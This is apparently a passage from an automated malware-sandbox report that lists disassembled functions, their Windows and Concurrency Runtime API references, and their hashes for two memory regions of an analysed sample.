                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 47415BB9244301BFE7609F50DC06F5ABBE8BF88B15F000429B688E62D0E7B0E504CB5A
                    Function 044E118A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E128D
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E12D9
                      • Part of subcall function 044E29D4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 044E2AC7
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 044E1345
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E1361
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E13B5
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E13E2
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044E1438
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction ID: 07bb2031e6381815ed8b9f384fd2061dd02d3954d4e8e04a6133b4dd5d497a66
                    • Opcode Fuzzy Hash: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction Fuzzy Hash: C5B19B70A40616AFDF18CF6AC981A7EB7B4FF88305F14816ED842AB741D770B981CB95
                    Function 00420F23 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421026
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421072
                      • Part of subcall function 0042276D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422860
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 004210DE
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 004210FA
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042114E
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042117B
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004211D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: afe0a21ddb237a3545ec7cee1ee931015f4d78d4a6e3d329f8f75f704a6fa3ae
                    • Instruction ID: 5a02515ce4d3d9bed4952b7643743e3afd61b43d92e326ff25b08a62267af8db
                    • Opcode Fuzzy Hash: afe0a21ddb237a3545ec7cee1ee931015f4d78d4a6e3d329f8f75f704a6fa3ae
                    • Instruction Fuzzy Hash: D5B18B70A00626EFCB18CF59E980B7AB7B4FF58300F54816EE901AB751D374AD91CB99
                    Function 044E1979 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044E3073: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 044E3086
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 044E198B
                      • Part of subcall function 044E3186: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 044E31B0
                      • Part of subcall function 044E3186: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 044E321F
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 044E1ABD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 044E1B1D
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 044E1B29
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 044E1B64
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 044E1B85
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 044E1B91
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 044E1B9A
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 044E1BB2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 2b9cc3df3638d42914e9d110f782bd07499a3cf788ddbb0d67833d56997de98e
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: B4814971E00225AFCF19CFAAC584A7EB7B2BF48305B1546AED445AB701D770B942CB80
                    Function 00421712 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00422E0C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421724
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422F49
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422FB8
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421856
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004218B6
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004218C2
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004218FD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042191E
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042192A
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421933
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042194B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 6480c2bc822c7efa029262303f0049bf934a4c623cf990800cc46984c91a1313
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: 4B816B71F00225AFCB18DF69D5C0A6EB7B6FF98304B6542AED405A7711C774AD42CB88
                    Function 004425B7 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373timeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction ID: a51b9741262bd5fe43f3912e7d7025e293ddec3c87bb67f0f185d4e0872f58d5
                    • Opcode Fuzzy Hash: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction Fuzzy Hash: 82C14A71900205AFEB14AF298E41BAF7BA9AF55354F9501AFF880D7381E7BC9E01C758
                    Function 00443248 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: ee95bb351dc8523afcc45ae6b1eea3e4f85a6720880c10ebcf805b516ff891d9
                    • Instruction ID: 1eb0146faae3b0d40eb0c369136c3e86e7d50dd255071a0ab2f6c3c9f3fb89fb
                    • Opcode Fuzzy Hash: ee95bb351dc8523afcc45ae6b1eea3e4f85a6720880c10ebcf805b516ff891d9
                    • Instruction Fuzzy Hash: E7C24E71E046288FEB24CE28DD407EAB7B5EB89705F1441EBD84DE7240E778AE818F45
                    Function 044EEFC0 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EEFF9
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044EF05F
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 044EF077
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 044EF084
                      • Part of subcall function 044EEB27: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 044EEB4F
                      • Part of subcall function 044EEB27: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 044EEBE7
                      • Part of subcall function 044EEB27: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 044EEBF1
                      • Part of subcall function 044EEB27: Concurrency::location::_Assign.LIBCMT ref: 044EEC25
                      • Part of subcall function 044EEB27: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044EEC2D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction ID: 482e91517c609c88c665b80f25d1309f6e16d519a1307c8f6c44117a51d15a81
                    • Opcode Fuzzy Hash: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction Fuzzy Hash: 1051B471A00214EBDF14DF52C895BBEB771AF44315F1440AAD9026B392CB31BE06CBA1
                    Function 0042ED59 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042ED92
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042EDF8
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042EE10
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042EE1D
                      • Part of subcall function 0042E8C0: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                      • Part of subcall function 0042E8C0: Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                      • Part of subcall function 0042E8C0: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction ID: 5dc5f2011173fc565dcc42a134e2cab6d96b6ac4c2e14078affee907e2800f85
                    • Opcode Fuzzy Hash: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction Fuzzy Hash: AC51D131B00224EBCF14DF52D885BAEB771AF44314F5540AAE9027B3D2CB38AE45CBA5
                    Function 00442DB0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: iCD$iCD
                    • API String ID: 0-1699611018
                    • Opcode ID: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction ID: 3233a7ddcac68cb8f574e6c19afe3b518d5c820d3ffb50c00228bdd3c5303718
                    • Opcode Fuzzy Hash: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction Fuzzy Hash: 7DF15071E002199FEF14CFA9C9806AEB7B1FF48714F25826AE815A7344D774AE05CB94
                    Function 044F6E25 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 044F6F1D
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 044F6F27
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 044F6F34
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction ID: a1ec147fd007ff8e7f62d4011bc633b662bd5db2d3c1adcc317fc3aec86b99cc
                    • Opcode Fuzzy Hash: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction Fuzzy Hash: C431B174901328ABDF21DF69DC8878DBBB8BF08314F5041EAE51CA6251EB74AB858F45
                    Function 00436BBE Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00436CB6
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00436CC0
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00436CCD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction ID: 0f3886a2ec1acb03bee09038ed9113ddd2f8fdea8ef426ce9efbf04155b938c1
                    • Opcode Fuzzy Hash: 3f4245e9d6dbb854288b09d2fe4b8be370def5759ab6404053b15e30bb198125
                    • Instruction Fuzzy Hash: 9D31F674901328ABCB21DF64D8887CDB7B8BF18315F1051EAE41CA7260E7749B818F49
                    Function 044F68A2 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,044F68A1,?,?,?,?,?,044F78F5), ref: 044F68C4
                    • TerminateProcess.KERNEL32(00000000,?,044F68A1,?,?,?,?,?,044F78F5), ref: 044F68CB
                    • ExitProcess.KERNEL32 ref: 044F68DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction ID: 30547619e3528984eb9d58d1d09a3bdf83405dc63f577d9402b2f458484e2460
                    • Opcode Fuzzy Hash: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction Fuzzy Hash: 45E04D36001A08ABCF122F64CD08A493F29FF00342B45442AFA098A232DF36E882CB90
                    Function 044C092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: efda7bda55eb193305a106f17ab64b75051809550acb191275080557bd1e698f
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: B73148B6900609DFEB50CF99C880BAEBBF9FF48324F18404AD541A7310D771EA45CBA4
                    Function 04503017 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8acd0b61eed91c271ce817c5816b3d8298a851003ad4eff16bf370477b945148
                    • Instruction ID: 6695bc69fc47290dc6a102e00225fea5d7f6a6dd4b1e03496b891ec83257ab85
                    • Opcode Fuzzy Hash: 8acd0b61eed91c271ce817c5816b3d8298a851003ad4eff16bf370477b945148
                    • Instruction Fuzzy Hash: 99F14F75E002199FDF14CFA9D9806EDFBB1FF88314F15826AD819AB384D731A941DB90
                    Function 0044783B Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: {2D${2D
                    • API String ID: 0-2096590240
                    • Opcode ID: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                    • Instruction ID: f28d3b2fb065a2a540a24e2a932b088d2ddba2ed5870c544b98f10ad0a23f3b5
                    • Opcode Fuzzy Hash: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                    • Instruction Fuzzy Hash: 0C11CA33F30C255B775C816D8C1727AA1D2DBD825070F433ED826E7284E994DE13D290
                    Function 04507350 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0450734B,?,?,00000008,?,?,045061D1,00000000), ref: 0450757D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction ID: af5a994072c805fce237798e9636c86709761283be2bc8ef0f5e3c1125906ffd
                    • Opcode Fuzzy Hash: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction Fuzzy Hash: FEB13939610609DFD718CF28D486AA57BA0FF49364F25C658E89ACF2E1C335F992DB40
                    Function 004470E9 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004470E4,?,?,00000008,?,?,00445F6A,00000000), ref: 00447316
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction ID: dfa5da92f367c00e141f1ccfad551ba81255b650924256d4cc29c0d116ebb7a0
                    • Opcode Fuzzy Hash: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction Fuzzy Hash: 2DB15B31614609CFE719CF28C486B657BE1FF05364F258699E89ACF3A1C339E982CB44
                    Function 0041DEA1 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041DEB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: baf477dcd9e2ffb395d9f4571bd26c70019c88d5c82d11edd63edb5a1f9492c6
                    • Instruction ID: d3e1f38e63fc8735de7ad419b849780ad5ffb32ec097b507978c801f90d6c61b
                    • Opcode Fuzzy Hash: baf477dcd9e2ffb395d9f4571bd26c70019c88d5c82d11edd63edb5a1f9492c6
                    • Instruction Fuzzy Hash: 1B518EB2E016158FDB15CF59D9917AEBBF0FB48310F24852AD405EB390E3B89981CF59
                    Function 044FDF17 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d6f7036121130a8bfb0198f060216b4852f831a24caa33bfb5425e04aae5a43
                    • Instruction ID: 17674ca9a204db0e1e02b9ec0e8a741356193a011fb936d814b24f7c9c131d4c
                    • Opcode Fuzzy Hash: 7d6f7036121130a8bfb0198f060216b4852f831a24caa33bfb5425e04aae5a43
                    • Instruction Fuzzy Hash: 4F4195B5C04219AEDF20DF69CC88EAAB7B9EF45304F1442DEE51DD3211DA35AE858F20
                    Function 0043DCB0 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d6f7036121130a8bfb0198f060216b4852f831a24caa33bfb5425e04aae5a43
                    • Instruction ID: 9fe6de17150940d3367818aba316cf5410ecc8e65c034dcd679d5eebdb7ff9be
                    • Opcode Fuzzy Hash: 7d6f7036121130a8bfb0198f060216b4852f831a24caa33bfb5425e04aae5a43
                    • Instruction Fuzzy Hash: 1C41B5B1C04219AEDB24DF69DC89AAABBB8EF49304F1452DEE40DD3211D6349E84CF14
                    Function 0041CCA7 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtFlushProcessWriteBuffers.NTDLL ref: 0041CCBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersFlushProcessWrite
                    • String ID:
                    • API String ID: 2982998374-0
                    • Opcode ID: 27e2aa7250c4dd2fc63f258ab67dc9e06b446d17aec3adfa31153d3d75196d6c
                    • Instruction ID: 44c0f8c996b8f95d7186e5f121910239c49d94f13c25d246e514d91215501cc8
                    • Opcode Fuzzy Hash: 27e2aa7250c4dd2fc63f258ab67dc9e06b446d17aec3adfa31153d3d75196d6c
                    • Instruction Fuzzy Hash: F3B09236E03930478A912B54BC4869E7714AA40B5270A01ABE809A73349A545C828BDD
